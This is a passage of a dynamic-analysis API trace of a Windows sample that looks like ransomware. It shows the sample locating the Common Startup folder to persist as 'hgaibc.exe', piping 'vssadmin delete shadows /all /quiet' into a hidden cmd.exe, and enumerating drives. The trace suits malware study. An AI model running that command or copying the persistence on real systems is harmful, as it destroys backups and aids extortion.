(lpString="kernel32.dll") returned 12 [0177.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x680000) returned 1 [0177.787] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bec50 | out: hHeap=0x680000) returned 1 [0177.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x2368020 | out: hHeap=0x680000) returned 1 [0177.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6e7788 [0177.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6f7790 [0177.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4978 [0177.812] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4978, Size=0x20) returned 0x6beb38 [0177.812] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6beb38, Size=0x40) returned 0x697828 [0177.813] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697828, Size=0x80) returned 0x6c3cf0 [0177.813] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c3cf0, Size=0x100) returned 0x6c5ff8 [0177.813] lstrlenW (lpString="") returned 0 [0177.813] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0177.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c) returned 0x6c6100 [0177.813] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0177.813] RegQueryValueExW (in: hKey=0x244, lpValueName="Common Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x6f7790, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x78) returned 0x0 [0177.813] RegCloseKey (hKey=0x244) returned 0x0 [0177.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6100 | out: hHeap=0x680000) returned 1 [0177.813] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0177.813] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0177.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c5ff8 | out: hHeap=0x680000) returned 1 [0177.813] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe", lpDst=0x6e7788, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe") returned 0x48 [0177.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6f7790 | out: hHeap=0x680000) returned 1 [0177.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6e7788 | out: hHeap=0x680000) returned 1 [0177.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x2364020 [0177.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4c00 [0177.816] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4c00, Size=0x20) returned 0x6bea20 [0177.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4c00 [0177.816] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4c00, Size=0x20) returned 0x6be9a8 [0177.817] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.817] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.817] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0177.817] lstrlenW (lpString="kernel32.dll") returned 12 [0177.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bea20 | out: hHeap=0x680000) returned 1 [0177.817] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6be9a8 | out: hHeap=0x680000) returned 1 [0177.817] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0177.817] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.817] CloseHandle (hObject=0x244) returned 1 [0177.817] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a98 [0177.817] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a98, Size=0x20) returned 0x6be930 [0177.817] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4c18 [0177.817] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4c18, Size=0x20) returned 0x6beb38 [0177.817] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.817] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.817] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0177.817] lstrlenW (lpString="kernel32.dll") returned 12 [0177.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beb38 | out: hHeap=0x680000) returned 1 [0177.817] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.818] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6be930 | out: hHeap=0x680000) returned 1 [0177.818] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x2364020 | out: hHeap=0x680000) returned 1 [0177.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c7778 | out: hHeap=0x680000) returned 1 [0177.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d7780 | out: hHeap=0x680000) returned 1 [0177.822] lstrlenW (lpString="%windir%\\System32") returned 17 [0177.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697678 | out: hHeap=0x680000) returned 1 [0177.822] lstrlenW (lpString="%appdata%") returned 9 [0177.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bed40 | out: hHeap=0x680000) returned 1 [0177.822] lstrlenW (lpString="%sh(Startup)%") returned 13 [0177.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x680000) returned 1 [0177.822] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0177.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697ab0 | out: hHeap=0x680000) returned 1 [0177.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4bd0 [0177.822] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4bd0, Size=0x20) returned 0x6be908 [0177.822] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6be908, Size=0x40) returned 0x697ab0 [0177.822] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697ab0, Size=0x80) returned 0x6c4680 [0177.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a98 [0177.822] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a98, Size=0x20) returned 0x6bea48 [0177.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1fffc) returned 0x6c7778 [0177.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6e7780 [0177.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6f7788 [0177.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a98 [0177.823] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a98, Size=0x20) returned 0x6becf0 [0177.823] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6becf0, Size=0x40) returned 0x697678 [0177.823] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697678, Size=0x80) returned 0x6c4460 [0177.823] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4460, Size=0x100) returned 0x6c5ff8 [0177.823] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0177.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c5ff8 | out: hHeap=0x680000) returned 1 [0177.823] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x6e7780, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0177.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6f7788 | out: hHeap=0x680000) returned 1 [0177.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6e7780 | out: hHeap=0x680000) returned 1 [0177.824] CreatePipe (in: hReadPipe=0x19fd50, hWritePipe=0x19fd54, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fd50*=0x248, hWritePipe=0x19fd54*=0x24c) returned 1 [0177.824] CreatePipe (in: hReadPipe=0x19fdc0, hWritePipe=0x19fdc4, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fdc0*=0x250, hWritePipe=0x19fdc4*=0x254) returned 1 [0177.825] SetHandleInformation (hObject=0x24c, dwMask=0x1, dwFlags=0x0) returned 1 [0177.825] SetHandleInformation (hObject=0x250, dwMask=0x1, dwFlags=0x0) returned 1 [0177.825] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fd60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254), lpProcessInformation=0x19fdb0 | out: lpCommandLine=0x0, lpProcessInformation=0x19fdb0*(hProcess=0x25c, hThread=0x258, dwProcessId=0xc40, dwThreadId=0xc48)) returned 1 [0177.837] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0177.837] WriteFile (in: hFile=0x24c, lpBuffer=0x6c4680*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x19fd5c, lpOverlapped=0x0 | out: lpBuffer=0x6c4680*, lpNumberOfBytesWritten=0x19fd5c*=0x41, lpOverlapped=0x0) returned 1 [0177.838] CloseHandle (hObject=0x25c) returned 1 [0177.838] CloseHandle (hObject=0x258) returned 1 [0177.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c7778 | out: hHeap=0x680000) returned 1 [0177.838] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0177.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c4680 | out: hHeap=0x680000) returned 1 [0177.838] lstrlenW (lpString="%comspec%") returned 9 [0177.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x680000) returned 1 [0177.838] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x258 [0177.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6c49f0 [0177.838] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x6c49f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x25c [0177.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf188 [0177.839] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x6bf188, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x264 [0177.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4b10 [0177.839] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4b10, Size=0x20) returned 0x6be908 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6be908, Size=0x40) returned 0x697798 [0177.840] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x69c290 [0177.840] GetLogicalDrives () returned 0x4 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10014) returned 0x6c7778 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4a08 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4a08, Size=0x20) returned 0x6bec00 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bec00, Size=0x40) returned 0x697ab0 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697ab0, Size=0x80) returned 0x6c3a48 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c3a48, Size=0x100) returned 0x6c6088 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c6088, Size=0x200) returned 0x6c6088 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c6088, Size=0x400) returned 0x6c6088 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c6088, Size=0x800) returned 0x6d7798 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6d7798, Size=0x1000) returned 0x6d7798 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x6d87a0 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c49c0 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6c4a08 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6bf1c8 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6c4978 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6bf198 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4c30 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bf198, Size=0x8) returned 0x6bf218 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4b28 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bf218, Size=0x10) returned 0x6c4b10 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4a68 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4a98 [0177.840] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4b10, Size=0x20) returned 0x6be8b8 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4990 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf208 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6c4bd0 [0177.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6c4be8 [0177.841] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6be8b8, Size=0x40) returned 0x697ab0 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6c4b10 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6c4ac8 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6c4b40 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6c4b58 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4b70 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4948 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf1e8 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4c00 [0177.841] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697ab0, Size=0x80) returned 0x6c45f8 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4b88 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4c18 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4960 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c49a8 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4ca8 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6c4d08 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4c90 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf288 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4c60 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4cf0 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6c4cc0 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4cd8 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6c4c48 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6c4c78 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8cb8 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8bf8 [0177.841] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c45f8, Size=0x100) returned 0x6c6088 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8ce8 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8dc0 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8c10 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6e8cd0 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8b20 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8b80 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf218 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8d78 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8b68 [0177.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8d00 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x6bf268 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8ad8 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8be0 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf098 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8d18 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8d30 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8d48 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8c88 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8d60 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8b38 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6e8b50 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8d90 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6e8bb0 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8af0 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8da8 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8b98 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8bc8 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf228 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8c28 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8b08 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8c40 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8c58 [0177.842] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c6088, Size=0x200) returned 0x6c6088 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8c70 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf238 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8ca0 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8e98 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8f70 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8ef8 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8e38 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8eb0 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8f88 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8e08 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8e50 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8e20 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8f40 [0177.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8f10 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8e68 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8e80 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8ec8 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8f58 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8f28 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8dd8 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8df0 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8ee0 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8a90 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf138 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8988 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e89b8 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8aa8 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf0d8 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8940 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8868 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8880 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8a60 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8a48 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e88b0 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e89d0 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8958 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8a00 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e88f8 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e89a0 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8928 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8910 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e88e0 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e87d8 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8a30 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8a78 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8820 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8970 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8838 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e89e8 [0177.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf198 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x6bf148 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8a18 [0177.844] 